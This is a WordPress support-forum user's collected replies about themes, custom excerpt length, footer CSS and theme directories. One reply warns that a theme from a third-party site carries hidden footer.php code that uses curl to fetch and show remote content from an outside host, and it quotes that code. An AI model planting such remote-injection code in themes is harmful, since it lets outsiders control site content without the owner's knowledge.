Len
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: how to set up a portal like homepageYou’re pulling posts from various categories using custom queries all styled by CSS. In this thread I listed several free magazine-styled themes that do this.
Forum: Fixing WordPress
In reply to: Totally Disatisfied with 2.7Glad you got it back. I was going to suggest also trying the Internet Archive.
Forum: Fixing WordPress
In reply to: Very new…Where can I get content?Where can I get content?
Um, your head?
If you’re looking for something to supplement your content try Googling “article directories” – some of them allow you to reprint their content on your site.
Forum: Themes and Templates
In reply to: Change theme on home menu@ mercime
I already tried to explain that to the OP where he asked the very same question in another thread but assumed he wasn’t interested.
Forum: Themes and Templates
In reply to: Need a theme, but can’t find what I’m looking forThe Themes section used to be searchable by various criteria. It also offered the ability to browse all themes.
To search by tag go to –>http://wordpress.org/extend/themes/tags/
To view theme by theme click “Newest Themes” and you’ll be presented with a list of themes with a navigation link at the bottom of the page.
Forum: Fixing WordPress
In reply to: Hide sidebar on Pages, visible on Posts – Page Width?You’re using the default Kubrick theme?
Forum: Fixing WordPress
In reply to: Hide sidebar on Pages, visible on Posts – Page Width?You’re on the right track. What theme are you using?
Forum: Everything else WordPress
In reply to: 125×125 Ad Boxes on my ThemeHi LilysGramma
I answered your question yesterday. How many times did you ask it? 🙂
Forum: Everything else WordPress
In reply to: 125×125 Ad Boxes on my Themeso when I put the link in, it gives me a “Page not found” message.
When you put what link in? The full URL of the image is,
http://www.myheartvoice.com/wp-content/themes/pink-orchid/ads/125-ad.jpg
The image is contained in a subfolder of your theme called ads. Just replace each instance with your own image using the same dimensions.
Forum: Plugins
In reply to: Changing the default length of the_excerptDupe post. Answered here.
Forum: Plugins
In reply to: Changing the default length of the_excerptI’m sure there must be something in the Plugin Directory that will do what you want although I haven’t looked.
Another method: insert the following in your theme’s function.php file,
remove_filter('get_the_excerpt', 'wp_trim_excerpt'); add_filter('get_the_excerpt', 'custom_trim_excerpt'); function custom_trim_excerpt($text) { // Fakes an excerpt if needed global $post; if ( '' == $text ) { $text = get_the_content(''); $text = apply_filters('the_content', $text); $text = str_replace(']]>', ']]>', $text); $text = strip_tags($text); $excerpt_length = x; $words = explode(' ', $text, $excerpt_length + 1); if (count($words) > $excerpt_length) { array_pop($words); array_push($words, '...'); $text = implode(' ', $words); } } return $text; }Adjust the line
$excerpt_length = x;to whatever you want.Yet another method (and one I don’t recommend) is to change the core file used to set excerpts. It is located at
wp-includes/formatting.phpLook for the lineexcerpt_lengthForum: Fixing WordPress
In reply to: How To Show Author’s Post?Speaking of plugging sites I thought I would visit the site our buddy Shane is plugging –> bestwpthemez.com
The VERY FIRST theme I downloaded and inspected contained the following in footer.php …
elseif(function_exists('curl_init')) { $ch = curl_init ("http://www.build-reciprocal-links.com/wordpress.asp"); curl_setopt ($ch, CURLOPT_HEADER, 0); curl_exec ($ch); if(curl_error($ch)) echo "All original content copyright © <a href='http://www.build-reciprocal-links.com/' target='_blank'>build-reciprocal-links.com</a> <br />All rights reserved. Design by <a href='http://www.build-reciprocal-links.com/' target='_blank'>Popular WordPress Themes</a> and Powered by <a href='http://www.accuwebhosting.com/' target='_blank'>Web Hosting.</a>"; curl_close ($ch); }For the uninformed that is curl. Using curl these clowns can display ANYTHING they want on your site. DO NOT USE THEMES FROM THIS SITE.
Forum: Fixing WordPress
In reply to: How To Show Author’s Post?for that you can also use various author tags for that please refer:
Why would he want to do that? He can refer to the Template Tags section of the Codex.
Are you here to help or plug your blog?
Forum: Fixing WordPress
In reply to: Changing the size of copyright text on bottom of page?Look in style.css for …
#footer { background:url(img/header_footer.jpg) 0 -132px no-repeat; display:block; height:88px; border-top:1px solid #CCC; font-size:11px; line-height:145%; width:100%; }Adjust
font-size:11px;to whatever you want. To make it bold add the following property to the block above …font-weight:bold;Forum: Fixing WordPress
In reply to: How To Show Author’s Post?Yeah, you can insert it into any page template you want. Just be sure to use it inside the loop.